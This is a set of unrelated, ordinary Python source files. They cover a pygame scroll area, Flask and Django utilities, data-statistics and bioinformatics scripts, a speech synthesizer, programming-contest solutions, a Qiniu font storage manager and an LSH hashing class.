shadow_position=_locals.POSITION_SOUTHEAST,
world=None,
):
assert isinstance(area_width, (int, float))
assert isinstance(area_height, (int, float))
assert isinstance(scrollbar_slider_pad, (int, float))
assert isinstance(scrollbar_thick, (int, float))
assert isinstance(shadow, bool)
assert isinstance(shadow_offset, (int, float))
assert_color(scrollbar_color)
assert_color(scrollbar_slider_color)
assert_color(shadow_color)
assert_position(shadow_position)
assert area_width > 0 and area_height > 0, \
'area size must be greater than zero'
self._rect = pygame.Rect(0.0, 0.0, area_width, area_height)
self._world = world # type: pygame.Surface
self._scrollbars = []
self._scrollbar_positions = tuple(set(scrollbars)) # Ensure unique
self._scrollbar_thick = scrollbar_thick
self._bg_surface = None
self._extend_x = extend_x
self._extend_y = extend_y
if area_color:
self._bg_surface = make_surface(width=area_width + extend_x,
height=area_height + self._extend_y)
if isinstance(area_color, _baseimage.BaseImage):
area_color.draw(surface=self._bg_surface, area=self._bg_surface.get_rect())
else:
self._bg_surface.fill(area_color)
self._view_rect = self.get_view_rect()
for pos in self._scrollbar_positions: # type:str
assert_position(pos)
if pos == _locals.POSITION_EAST or pos == _locals.POSITION_WEST:
sbar = ScrollBar(self._view_rect.height, (0, max(1, self.get_hidden_height())),
orientation=_locals.ORIENTATION_VERTICAL,
slider_pad=scrollbar_slider_pad,
slider_color=scrollbar_slider_color,
page_ctrl_thick=scrollbar_thick,
page_ctrl_color=scrollbar_color,
onchange=self._on_vertical_scroll)
else:
sbar = ScrollBar(self._view_rect.width, (0, max(1, self.get_hidden_width())),
slider_pad=scrollbar_slider_pad,
slider_color=scrollbar_slider_color,
page_ctrl_thick=scrollbar_thick,
page_ctrl_color=scrollbar_color,
onchange=self._on_horizontal_scroll)
sbar.set_shadow(enabled=shadow,
color=shadow_color,
position=shadow_position,
offset=shadow_offset)
sbar.set_controls(joystick=False)
self._scrollbars.append(sbar)
self._apply_size_changes()
def _apply_size_changes(self):
"""
Apply size changes to scrollbar.
:return: None
"""
self._view_rect = self.get_view_rect()
for sbar in self._scrollbars:
pos = self._scrollbar_positions[self._scrollbars.index(sbar)]
if pos == _locals.POSITION_WEST:
sbar.set_position(self._view_rect.left - self._scrollbar_thick, self._view_rect.top)
elif pos == _locals.POSITION_EAST:
sbar.set_position(self._view_rect.right, self._view_rect.top)
elif pos == _locals.POSITION_NORTH:
sbar.set_position(self._view_rect.left, self._view_rect.top - self._scrollbar_thick)
else:
sbar.set_position(self._view_rect.left, self._view_rect.bottom)
if pos in (_locals.POSITION_NORTH, _locals.POSITION_SOUTH) \
and self.get_hidden_width() != sbar.get_maximum() \
and self.get_hidden_width() != 0:
sbar.set_length(self._view_rect.width)
sbar.set_maximum(self.get_hidden_width())
sbar.set_page_step(self._view_rect.width * self.get_hidden_width() /
(self._view_rect.width + self.get_hidden_width()))
elif pos in (_locals.POSITION_EAST, _locals.POSITION_WEST) \
and self.get_hidden_height() != sbar.get_maximum() \
and self.get_hidden_height() != 0:
sbar.set_length(self._view_rect.height)
sbar.set_maximum(self.get_hidden_height())
sbar.set_page_step(self._view_rect.height * self.get_hidden_height() /
(self._view_rect.height + self.get_hidden_height()))
def draw(self, surface):
"""
Called by end user to draw state to the surface.
:param surface: Surface to render the area
:type surface: :py:class:`pygame.Surface`
:return: None
"""
if not self._world:
return
if self._bg_surface:
surface.blit(self._bg_surface, (self._rect.x - self._extend_x, self._rect.y - self._extend_y))
offsets = self.get_offsets()
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL:
if self.get_hidden_width():
sbar.draw(surface) # Display scrollbar
else:
if self.get_hidden_height():
sbar.draw(surface) # Display scrollbar
surface.blit(self._world, self._view_rect.topleft, (offsets, self._view_rect.size))
def get_hidden_width(self):
"""
Return the total width out of the bounds of the the viewable area.
Zero is returned if the world width is lower than the viewable area.
:return: None
"""
if not self._world:
return 0
return max(0, self._world.get_width() - self._view_rect.width)
def get_hidden_height(self):
"""
Return the total height out of the bounds of the the viewable area.
Zero is returned if the world height is lower than the viewable area.
:return: None
"""
if not self._world:
return 0
return max(0, self._world.get_height() - self._view_rect.height)
def get_offsets(self):
"""
Return the offset introduced by the scrollbars in the world.
:return: None
"""
offsets = [0, 0]
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL:
if self.get_hidden_width():
offsets[0] = sbar.get_value()
else:
if self.get_hidden_height():
offsets[1] = sbar.get_value()
return offsets
def get_rect(self):
"""
Return the Rect object.
:return: Pygame.Rect object
:rtype: :py:class:`pygame.Rect`
"""
return self._rect.copy()
def get_scrollbar_thickness(self, orientation):
"""
Return the scroll thickness of the area. If it's hidden return zero.
:param orientation: Orientation of the scroll
:type orientation: str
:return: Thickness in px
:rtype: int
"""
if orientation == _locals.ORIENTATION_HORIZONTAL:
return self._rect.height - self._view_rect.height
elif orientation == _locals.ORIENTATION_VERTICAL:
return self._rect.width - self._view_rect.width
return 0
def get_view_rect(self):
"""
Subtract width of scrollbars from area with the given size and return
the viewable area.
The viewable area depends on the world size, because scroll bars may
or may not be displayed.
:return: None
"""
rect = pygame.Rect(self._rect)
# No scrollbar: area is large enough to display world
if not self._world or (self._world.get_width() <= self._rect.width
and self._world.get_height() <= self._rect.height):
return rect
# All scrollbars: the world is too large
if self._world.get_height() > self._rect.height \
and self._world.get_width() > self._rect.width:
if _locals.POSITION_WEST in self._scrollbar_positions:
rect.left += self._scrollbar_thick
rect.width -= self._scrollbar_thick
if _locals.POSITION_EAST in self._scrollbar_positions:
rect.width -= self._scrollbar_thick
if _locals.POSITION_NORTH in self._scrollbar_positions:
rect.top += self._scrollbar_thick
rect.height -= self._scrollbar_thick
if _locals.POSITION_SOUTH in self._scrollbar_positions:
rect.height -= self._scrollbar_thick
return rect
# Calculate the maximum variations introduces by the scrollbars
bars_total_width = 0
bars_total_height = 0
if _locals.POSITION_NORTH in self._scrollbar_positions:
bars_total_height += self._scrollbar_thick
if _locals.POSITION_SOUTH in self._scrollbar_positions:
bars_total_height += self._scrollbar_thick
if _locals.POSITION_WEST in self._scrollbar_positions:
bars_total_width += self._scrollbar_thick
if _locals.POSITION_EAST in self._scrollbar_positions:
bars_total_width += self._scrollbar_thick
if self._world.get_height() > self._rect.height:
if _locals.POSITION_WEST in self._scrollbar_positions:
rect.left += self._scrollbar_thick
rect.width -= self._scrollbar_thick
if _locals.POSITION_EAST in self._scrollbar_positions:
rect.width -= self._scrollbar_thick
if self._world.get_width() > self._rect.width - bars_total_width:
if _locals.POSITION_NORTH in self._scrollbar_positions:
rect.top += self._scrollbar_thick
rect.height -= self._scrollbar_thick
if _locals.POSITION_SOUTH in self._scrollbar_positions:
rect.height -= self._scrollbar_thick
if self._world.get_width() > self._rect.width:
if _locals.POSITION_NORTH in self._scrollbar_positions:
rect.top += self._scrollbar_thick
rect.height -= self._scrollbar_thick
if _locals.POSITION_SOUTH in self._scrollbar_positions:
rect.height -= self._scrollbar_thick
if self._world.get_height() > self._rect.height - bars_total_height:
if _locals.POSITION_WEST in self._scrollbar_positions:
rect.left += self._scrollbar_thick
rect.width -= self._scrollbar_thick
if _locals.POSITION_EAST in self._scrollbar_positions:
rect.width -= self._scrollbar_thick
return rect
def get_world_size(self):
"""
Return world size.
:return: width, height in pixels
:rtype: tuple
"""
if self._world is None:
return 0, 0
return self._world.get_width(), self._world.get_height()
def _on_horizontal_scroll(self, value):
"""
Call when a horizontal scroll bar as changed to update the
position of the opposite one if it exists.
:param value: New position of the slider
:type value: float
:return: None
"""
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL \
and self.get_hidden_width() != 0 \
and sbar.get_value() != value:
sbar.set_value(value)
def _on_vertical_scroll(self, value):
"""
Call when a vertical scroll bar as changed to update the
position of the opposite one if it exists.
:param value: New position of the slider
:type value: float
:return: None
"""
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_VERTICAL \
and self.get_hidden_height() != 0 \
and sbar.get_value() != value:
sbar.set_value(value)
def scroll_to_rect(self, rect, margin=10.0):
"""
Ensure that the given rect is in the viewable area.
:param rect: Rect in the world surface reference
:type rect: :py:class:`pygame.Rect`
:param margin: Extra margin around the rect
:type margin: int, float
:return: None
"""
assert isinstance(margin, (int, float))
real_rect = self.to_real_position(rect)
if self._view_rect.topleft[0] < real_rect.topleft[0] \
and self._view_rect.topleft[1] < real_rect.topleft[1] \
and self._view_rect.bottomright[0] > real_rect.bottomright[0] \
and self._view_rect.bottomright[1] > real_rect.bottomright[1]:
return # rect is in viewable area
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL and self.get_hidden_width():
shortest_move = min(real_rect.left - margin - self._view_rect.left,
real_rect.right + margin - self._view_rect.right, key=abs)
value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)
value = max(sbar.get_minimum(), value)
sbar.set_value(value)
if sbar.get_orientation() == _locals.ORIENTATION_VERTICAL and self.get_hidden_height():
shortest_move = min(real_rect.bottom + margin - self._view_rect.bottom,
real_rect.top - margin - self._view_rect.top, key=abs)
value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)
value = max(sbar.get_minimum(), value)
sbar.set_value(value)
def set_position(self, posx, posy):
"""
Set the position.
:param posx: X position
:type posx: int, float
:param posy: Y position
:type posy: int, float
:return: None
"""
self._rect.x = posx
self._rect.y = posy
self._apply_size_changes()
def set_world(self, surface):
"""
Update the scrolled surface.
:param surface: New world surface
:type surface: :py:class:`pygame.Surface`
:return: None
"""
self._world = surface
self._apply_size_changes()
def to_real_position(self, virtual, visible=False):
"""
Return the real position/Rect according to the scroll area origin
of a position/Rect in the world surface reference.
:param virtual: Position/Rect in the world surface reference
:type virtual: :py:class:`pygame.Rect`, tuple, list
:param visible: If a rect is given, return only the visible width/height
:type visible: bool
:return: real rect or real position
:rtype: :py:class:`pygame.Rect`, tuple
"""
assert isinstance(virtual, (pygame.Rect, tuple, list))
offsets = self.get_offsets()
if isinstance(virtual, pygame.Rect):
rect = pygame.Rect(virtual)
rect.x = self._rect.x + virtual.x - offsets[0]
rect.y = self._rect.y + virtual.y - offsets[1]
if visible:
return self._view_rect.clip(rect) # Visible width and height
return rect
x_coord = self._rect.x + virtual[0] - offsets[0]
y_coord = self._rect.y + virtual[1] - offsets[1]
return x_coord, y_coord
def to_world_position(self, real):
"""
Return the position/Rect in the world surface reference
of a real position/Rect according to the scroll area origin.
:param real: Position/Rect according scroll area origin
:type real: :py:class:`pygame.Rect`, tuple, list
:return: rect in world or position in world
:rtype: :py:class:`pygame.Rect`, tuple
"""
assert isinstance(real, (pygame.Rect, tuple, list))
offsets = self.get_offsets()
if isinstance(real, pygame.Rect):
rect = pygame.Rect(real)
rect.x = real.x - self._rect.x + offsets[0]
rect.y = real.y - self._rect.y + offsets[1]
return rect
x_coord = real[0] - self._rect.x + offsets[0]
y_coord = real[1] - self._rect.y + offsets[1]
return x_coord, y_coord
def is_scrolling(self):
"""
Returns true if the user is scrolling.
:return: True if user scrolls
:rtype: bool
"""
scroll = False
for sbar in self._scrollbars: # type: ScrollBar
scroll = scroll or sbar.scrolling
return scroll
def update(self, events):
"""
Called by end user to update scroll state.
:param events: List of pygame events
:type events: list
:return: True if updated
:rtype: bool
"""
updated = [0, 0]
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL and not updated[0]:
updated[0] = sbar.update(events)
elif sbar.get_orientation() == _locals.ORIENTATION_VERTICAL and not updated[1]:
updated[1] = sbar.update(events)
return updated[0] or updated[1]
|
from flask_wtf import FlaskForm
from wtforms import SubmitField, RadioField, StringField, validators
class ShowRecords(FlaskForm):
record_list = RadioField("Список записів: ", coerce=int)
back = SubmitField('<- Назад')
delete = SubmitField('Видалити')
add = SubmitField('Додати')
update = SubmitField('Редагувати')
|
import os
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import sys
def density_plot(result_sizes):
# Density Plot with Rug Plot
sns.distplot(result_sizes, hist=True, kde=True, rug=True,
color='darkblue',
kde_kws={'linewidth': 2},
rug_kws={'color': 'black'})
# Plot formatting
plt.title('Density Plot of the size of html file in Kb')
plt.xlabel('HTML size, Kb')
plt.ylabel('Density')
plt.xlim((0, max(result_sizes)))
plt.xticks(np.linspace(0, max(result_sizes), num=11))
plt.show()
def main():
file_sizes = []
# reading command line arguments:
if len(sys.argv) not in (3, 4):
print("Wrong number of system arguments. To get 0-25 percentile,")
print("try sth like:")
print("python3 html_stats_from_file.py ../google-benchmark/test.txt "
"test-websites plot=False")
return
input_file, db_directory = sys.argv[1:3]
print(input_file, db_directory)
# recursively walking through all files:
with open(input_file, 'r') as file:
# cutting the 'http://10.42.0.1/' from the path:
for line in file:
line = line.strip()
slash_count, index = 0, 0
while slash_count < 3 and index != len(line):
if line[index] == '/':
slash_count += 1
index += 1
filepath = line[index:]
print(filepath)
# opening the file stats, and saving the size of the file to list
file_stats = os.stat(db_directory + '/' + filepath)
file_sizes.append(file_stats.st_size / 1024)
print(file_sizes)
# sorting by the file_size
# file_list.sort(key=lambda x: x[1])
df_describe = pd.DataFrame(file_sizes)
print("The following stats, except for count, are in Kilobytes:", df_describe.describe())
print("Total size of", len(file_sizes), "html files is", sum(file_sizes), "Kb")
if sys.argv[-1] == "plot=True":
density_plot(file_sizes)
if __name__ == '__main__':
main()
|
a=input().split(' ')
s=[]
w=[]
n=[]
e=[]
k=0
l=[]# To store the directions.
l1=[]# To strore the attacking strength.
for i in range(0,len(a)): # The loop is to extract the directions along with attacking strenth.
if a[1]=='1$':#Checks whether the input starts with day 1.
if a[i]=='W' or a[i]=='E' or a[i]=='N' or a[i]=='S' :
l.append(a[i])#Updates the direction to list 'l'.
l1.append(int(a[i+4]))#Updates the attacking strength to list 'l1' with same index corresponding to direction.
else:#If the input not starts with day 1.
print("Enter from day 1")
k=1
break
l2=[]
for i in range(0,len(l)):#This loop is to split the first occurence of direction because we cannot compare with null values.
if l[i] not in l2:#Checks whether the direction is occured for first time.
if l[i]=='E':
e.append(l1[i])#Updates the strenth of attack occured on East.
l2.append(l[i])#Updates the direction in list 'l2'.
if l[i]=='W':
w.append(l1[i])#Updates the strenth of attack occured on West.
l2.append(l[i])#Updates the direction in list 'l2'.
if l[i]=='N':
n.append(l1[i])#Updates the strenth of attack occured on North.
l2.append(l[i])#Updates the direction in list 'l2'.
if l[i]=='S':
s.append(l1[i])#Updates the strenth of attack occured on South.
l2.append(l[i])#Updates the direction in list 'l2'.
else:#This statement works if the direction is occuring second time.
if l[i]=='E':#East side.
el=sorted(e)
if el[len(el)-1] < l1[i]:#Checks whether the strenth is greater than previous one.
e.append(l1[i])
if l[i]=='W':#West side.
wl=sorted(w)
if wl[len(wl)-1] < l1[i]:#Checks whether the strenth is greater than previous one.
w.append(l1[i])
if l[i]=='N':#North side.
nl=sorted(n)
if nl[len(nl)-1] < l1[i]:#Checks whether the strenth is greater than previous one.
n.append(l1[i])
if l[i]=='S':#South side.
sl=sorted(s)
if sl[len(sl)-1] < l1[i]:#Checks whether the strenth is greater than previous one.
s.append(l1[i])
n=len(e)+len(w)+len(n)+len(s)
if k!=1:#Prints only if input starts with day 1.
print(n)
|
# !/usr/bin/env python
# coding=utf-8
# author: sunnywalden@gmail.com
import qiniu
import os
import requests
import sys
BASE_DIR = os.path.abspath(os.path.join(os.getcwd(), ".."))
sys.path.append(BASE_DIR)
from utils.get_logger import Log
from conf import config
from utils.fonts_scanner import get_fonts_from_local
class QiniuManager:
def __init__(self):
log = Log()
self.logger = log.logger_generate('qiniu_manage')
self.auth = self.get_auth()
def get_auth(self):
auth = qiniu.Auth(config.qiniu_accesskeyid, config.qiniu_accesskeysecret)
return auth
def print_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
fonts_object_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
fonts_list = list(map(lambda font_object: font_object['key'].split(prefix)[-1], fonts_object_list))
self.logger.info('Fonts found in qiniu %s' % fonts_list)
print(fonts_list)
def get_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
bucket = qiniu.BucketManager(self.auth)
ret, eof, info = bucket.list(config.qiniu_fonts_bucket, prefix)
fonts_object_list = list(filter(lambda font_info: font_info['key'].startswith(prefix) and keyword in font_info['key'] and ''.join(font_info['key'].split(prefix)[-1]).startswith(pref), ret['items']))
# fonts_list = list(map(lambda font_info: font_info['key'].split(config.qiniu_fonts_prefix)[1], ret['items']))
self.logger.info('There was %s fonts matched in qiniu' % len(fonts_object_list))
print('There was %s fonts matched in qiniu' % len(fonts_object_list))
# print(fonts_object_list)
return fonts_object_list
def download_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
fonts_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
for fonts_file in fonts_list:
# private_url = self.auth.private_download_url(config.qiniu_domain + '/' + pref + fonts_file)
font_name = fonts_file['key'].split(prefix)[-1]
font_url = config.qiniu_domain + '/' + fonts_file['key']
private_url = self.auth.private_download_url(font_url)
print('Start to download resourse %s' % font_url)
self.logger.info('Start to download resourse %s' % font_url)
res = requests.get(private_url)
assert res.status_code == 200
font_file = res.content
storage_path = os.path.join(BASE_DIR, config.qiniu_download_url)
# print(storage_path)
font_path = os.path.join(storage_path, font_name)
# print(font_path)
with open(font_path, 'wb') as f:
f.write(font_file)
self.logger.info('Fonts %s download success' % fonts_file)
def upload_fonts(self, prefix=config.qiniu_fonts_prefix):
fonts_list = get_fonts_from_local()
bucket_name = config.qiniu_fonts_bucket
for fonts_file in fonts_list:
font_name = prefix + fonts_file.split('/')[-1]
token = self.auth.upload_token(bucket=bucket_name, key=font_name)
print(font_name)
print(fonts_file)
self.logger.info('Start to upload fonts %s' % fonts_file)
res, info = qiniu.put_file(token, font_name,
fonts_file)
print(res, info)
assert info.status_code == 200
self.logger.info('Fonts %s upload success' % fonts_file)
def delete_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
fonts_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
delete_fonts_object = list(
filter(lambda fonts_file: keyword in fonts_file['key'] and fonts_file['key'].split(prefix)[-1].startswith(pref),
fonts_list))
delete_fonts = list(map(lambda font_object: font_object['key'], delete_fonts_object))
if not delete_fonts:
print('No fonts matched for delete in qiniu fonts bucket')
else:
print('Fonts to be deleted %s' % delete_fonts)
self.logger.info('Fonts to be deleted %s' % delete_fonts)
bucket = qiniu.BucketManager(self.auth)
ops = qiniu.build_batch_delete(config.qiniu_fonts_bucket, delete_fonts)
res, info = bucket.batch(ops)
print(res, info)
assert info.status_code == 200
print('Fonts %s delete success' % delete_fonts)
self.logger.info('Fonts %s delete success' % delete_fonts)
if __name__ == '__main__':
bucket_region = 'shanghai'
# if you are not in a aliyun env, please set it to False
inter_net = False
bk_manage = QiniuManager()
# print all fonts in ali oss font_dir
bk_manage.print_fonts(keyword='AlibabaSans', pref='AlibabaSans')
# # download all fonts from to local dir ./downloads/
# bk_manage.download_fonts(keyword='AlibabaSans', pref='AlibabaSans')
# upload all fonts in local dir ./fonts/
# bk_manage.upload_fonts()
# delete all fonts have keyword
# bk_manage.delete_fonts(keyword='test', pref='test')
|
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.utils.decorators import available_attrs
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
default_message = "You must Log In first!"
def user_passes_test(test_func, message=default_message):
"""
Decorator for views that checks that the user passes the given test,
setting a message in case of no success. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
if not test_func(request.user):
messages.success(request, message)
return view_func(request, *args, **kwargs)
return _wrapped_view
return decorator
def login_required_message(function=None, message=default_message):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated,
message=message,
)
if function:
return actual_decorator(function)
return actual_decorator
def login_required_message_and_redirect(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None, message=default_message):
if function:
return login_required_message(
login_required(function, redirect_field_name, login_url),
message
)
return lambda deferred_function: login_required_message_and_redirect(deferred_function, redirect_field_name, login_url, message)
|
my_file = open('hairpin.fa', 'r')
lines = my_file.readlines()
y = ''
fileText = ""
text = []
for line in lines:
if line.rstrip("\r\n"):
if line.rstrip("\r\n").find(">") == 0:
if text:
fileText = fileText + ''.join(text)
fileText = fileText + "\n"
fileText = fileText + line.rstrip("\r\n")
fileText = fileText + "\n"
y = ''
text = []
else:
y = ''.join(line.rstrip("\r\n"))
text.append(y)
fileText = fileText + ''.join(text)
print(fileText)
fh = open("test.txt", "w")
fh.write(fileText)
fh.close() |
# Generated by Django 2.2.17 on 2021-03-10 19:38
from django.db import migrations, models
import django.db.models.deletion
def create_event_host_to_sponsor(apps, schema_editor):
"""Copy event.host to event.sponsor for existing events."""
Event = apps.get_model("workshops", "Event")
Event.objects.exclude(host__isnull=True).update(sponsor=models.F('host'))
class Migration(migrations.Migration):
dependencies = [
('workshops', '0234_auto_20210228_0940'),
]
operations = [
migrations.RemoveField(
model_name='event',
name='sponsors',
),
migrations.AddField(
model_name='event',
name='sponsor',
field=models.ForeignKey(blank=False, help_text='Institution that is funding or organising the workshop.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sponsored_events', to='workshops.Organization'),
),
migrations.RunPython(create_event_host_to_sponsor, migrations.RunPython.noop),
migrations.AlterField(
model_name='event',
name='administrator',
field=models.ForeignKey(blank=False, help_text='Lesson Program administered for this workshop.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='administered_events', to='workshops.Organization'),
),
migrations.AlterField(
model_name='event',
name='host',
field=models.ForeignKey(help_text='Organisation hosting the event.', on_delete=django.db.models.deletion.PROTECT, related_name='hosted_events', to='workshops.Organization'),
),
migrations.DeleteModel(
name='Sponsorship',
),
]
|
import wave
import math
import struct
import subprocess
import thread
import sys
from Phonemes import Phonemes
from Syllables import Syllables
class SimpleSynthesizer(object):
SPACERS = {
" ": 0.2,
",": 0.4,
".": 0.6}
ACCENT_FACTOR = 2.0
PHONEMES_PATHS = ["synteza_mowy/p1/fonemy2016", "synteza_mowy/p1/fonemy_bodek", "synteza_mowy/p1/dzwieki1"]
@classmethod
def synthesize(cls, phonemes, phonemes_set):
phonemes_path = cls.PHONEMES_PATHS[phonemes_set%3]
output_path = "synteza_mowy/p1/output.wav"
cls._synthesize(phonemes, phonemes_path, output_path)
try:
thread.start_new_thread(cls.play, (output_path,))
except:
print "Error: unable to start thread"
@classmethod
def _synthesize(cls, phonemes, phonemes_path, output_path):
wave_output = wave.open(output_path, "w")
wave_output.setparams(cls.wave_getparams(phonemes_path))
phonemes_bytes = []
syllables_num = -1
accent_on = -1
i = 0
while i < len(phonemes):
p = phonemes[i]
if Phonemes.is_phoneme(p):
# set accent
if syllables_num < 0:
syllables_num = 0
accent_on = Syllables.count_syllables(phonemes, i)
if accent_on == 1:
accent_on -= 1
else:
accent_on -= 2
p_wav = wave.open(cls.phoneme_wav_path(p, phonemes_path), "r")
p_bytes = p_wav.readframes(p_wav.getnframes())
p_wav.close()
if syllables_num == accent_on:
phonemes_bytes.append(p_bytes)
else:
phonemes_bytes.append(cls.set_volume(p_bytes, 1.0/cls.ACCENT_FACTOR))
elif p == "|":
syllables_num += 1
else:
syllables_num = accent_on = -1
if cls.SPACERS.has_key(p):
phonemes_bytes.append(cls.gen_silence(cls.SPACERS[p], phonemes_path))
i+=1
wave_output.writeframes("".join(phonemes_bytes))
wave_output.close()
@classmethod
def phoneme_wav_path(cls, phoneme, phonemes_path):
return phonemes_path+"/"+phoneme+".wav"
@classmethod
def wave_getparams(phonemes_pathcls, phonemes_path):
s = wave.open(phonemes_path+"/a.wav", "rb")
params = s.getparams()
s.close
return params
@classmethod
def gen_silence(cls, seconds, phonemes_path):
(_, _, framerate, _, _, _) = cls.wave_getparams(phonemes_path)
values = []
for i in range(0, int(framerate*seconds)):
values.append(struct.pack("h", 0))
return "".join(values)
@classmethod
def set_volume(cls, values, factor):
new_values = []
for i in range(0, len(values)/2):
(v,) = struct.unpack("h", values[2*i:2*i+2])
new_values.append(struct.pack("h", int(v)*factor))
return "".join(new_values)
@classmethod
def play(cls, path):
if sys.platform == "darwin":
subprocess.call(["afplay", path])
elif sys.platform == "linux2":
subprocess.call(["aplay", path, "-q"])
|
#! /usr/bin/env python2.7
T=int(raw_input())
NJ=raw_input().split()
N=int(NJ[0])
J=int(NJ[1])
DivMax=212 # the max div to check
PrimeList=range(2,DivMax)
# for optimization, we build a list of primes less then DivMax
for i in range(4,DivMax):
if i %2==0 :
PrimeList.pop(PrimeList.index(i))
continue
j=3
while j<=i**0.5:
if i %j==0 :
PrimeList.pop(PrimeList.index(i))
break
j+=2
for test in range(1,T+1):
# Approach : we will brute force the problem, start from the minimum number statisfying conditions on coinjam, and test whether it is a coinjam
# or not, then move forward (by adding 2)
CJlist=[]
Nbr=2**(N-1)+1
while len(CJlist)<J:
#Nbr=eval("0b"+bin(i)[2:]+"1")
IsJamCoin=True
DivList=[]
bits=[int(bit) for bit in list(bin(Nbr)[2:])]
for base in range(2,11):
# Calculat sting interpretation in base "base"
M=0
for j in range(len(bits)):
M=M+bits[j]*base**j
# Check primality, we will only check against primes in PrimeList, that's to say divisor less or equal to DivMax
IsPrime=True
RM=M**0.5
j=0
while j< len(PrimeList) & PrimeList[j] <=RM:
prime =PrimeList[j]
if M % prime==0:
IsPrime=False
DivList.append(prime)
break
j+=1
if IsPrime:
IsJamCoin=False
break
if IsJamCoin :
CJlist.append([Nbr, DivList])
Nbr+=2
# We suppose that hopefully we have got J jamCoins of length N with divisors of their repesentations in base 2 to 10
# we print the result
print "Case #{}:".format(test)
for line in CJlist:
Nbr=line[0]
bits=[str(bit) for bit in list(bin(Nbr)[2:])]
bits.reverse()
DivList=[str(prime) for prime in line[1]]
print "".join(bits)+" "+ " ".join(DivList)
#checking
for line in CJlist:
Nbr=line[0]
DivList=line[1]
bits=[int(bit) for bit in list(bin(Nbr)[2:])]
for base in range(2,11):
M=0
for j in range(len(bits)):
M=M+bits[j]*base**j
if M % DivList[base-2] >0:
print "you missed nbr=" , bin(Nbr)[2:] , "base= ", base
|
import os
import os.path
import sys
from sys import platform
sys.path.append(os.path.join(os.getcwd(), "Measures"))
import numpy as np
import pandas as pd
from collections import defaultdict
from sklearn.utils import check_random_state
from sklearn.utils.validation import check_array
import timeit
import random
from .SimpleHashing import SimpleHashing
from collections import defaultdict
import statistics
from collections import Counter
class LSH(SimpleHashing):
def DoHash(self):
self.measure.GeneratesimMatrix()
self.GenerateSimilarityMatrix(self.measure.simMatrix)
self.bit_indexes = np.argpartition(self.cut_values_normal, self.hbits)[:self.hbits]
self.GenerateHashTable()
return -1
def GenerateHashTable(self):
print("Generating LSH hash table: ", " hbits:", str(self.hbits) +'('+ str(2**self.hbits)+')', " k", self.k , " d", self.d , " n=",self.n )
self.hash_values = [self.ComputeHashValue(x) for x in self.X]
self.hashTable = defaultdict(list)
for i in range(self.n):
self.hashTable[self.hash_values[i]].append(i)
def GetNeighborsbyBucket(self, item_id):
return self.hashTable[self.hash_values[item_id]]
def ComputeHashValue(self,x):
val=0
for i in range(self.hbits):
partitions = self.partitions[self.bit_indexes[i]]
val <<=1
if x[self.bit_indexes[i]] in partitions[1]:
val+=1
return val
#def ComputeHashValue(self,x):
# val=0
# for i in range(self.hbits):
# #partitions = self.partitions[self.bit_indexes[i]]
# val <<=1
# #if x[self.bit_indexes[i]] in partitions[1]:
# if x[self.bit_indexes[i]] >= self.D[self.bit_indexes[i]]/2:
# val+=1
# return val
#def TryToMovePoint(self,hashValue_ori, hashValue_cur, index ):
#for i in range(index,self.hbits):
def hammingDistance(self, x, y):
ans = 0
for i in range(31,-1,-1):
b1= x>>i&1
b2 = y>>i&1
ans+= not(b1==b2)
return ans
def CorrectSingletonBucket(self):
list_hash_1 = []
for hashValue,itemList in self.hashTable.items():
if(len(itemList)<=1):
list_hash_1.append((hashValue, itemList))
for iters in list_hash_1:
del self.hashTable[iters[0]]
for iters in list_hash_1:
closest_hash_value = -1
closest_dist=1000000
for hashValue,itemList in self.hashTable.items():
temp = self.hammingDistance(iters[0],hashValue)
if temp < closest_dist:
closest_hash_value = hashValue
closest_dist = temp
for i in iters[1]:
self.hash_values[i] = closest_hash_value
self.hashTable[closest_hash_value].append(i)
print("LSH Merged ",len(list_hash_1),"/", len(self.hashTable) , " buckets!!!" )
def TestHashTable(self):
n = len(self.hashTable.items())
num_0 = 2**self.hbits - len(self.hashTable.items());
num_1 = 0;
len_list=[]
for hashValue,itemList in self.hashTable.items():
if(len(itemList)==1): num_1+=1
len_list.append(len(itemList))
mean=np.mean(len_list)
std_ = np.std(len_list)
print( "Num bucket:",n," Num zero:", num_0, " Num 1:", num_1, " Mean:", mean, " Std:",std_)
#Test within buckets
sum_=0
for hashValue,itemList in self.hashTable.items():
labels = self.y[itemList]
test_list = Counter(labels)
domiant_label = test_list.most_common(1)[0][0]
sum_+= sum(labels==domiant_label)
return sum_/self.n
def main():
MeasureManager.CURRENT_MEASURE = 'DILCA'
DB = tulti.LoadSynthesisData(n=2048,d=10,k=20,sigma_rate=0.1);
MeasureManager.CURRENT_DATASET = DB['name']
hashing = LSH(DB['DB'],DB['labels_'],measure='DILCA')
hashing.test()
hashing.DoHash()
score = hashing.TestHashTable()
print('Score: ', score)
hashing.CorrectSingletonBucket();
score = hashing.TestHashTable()
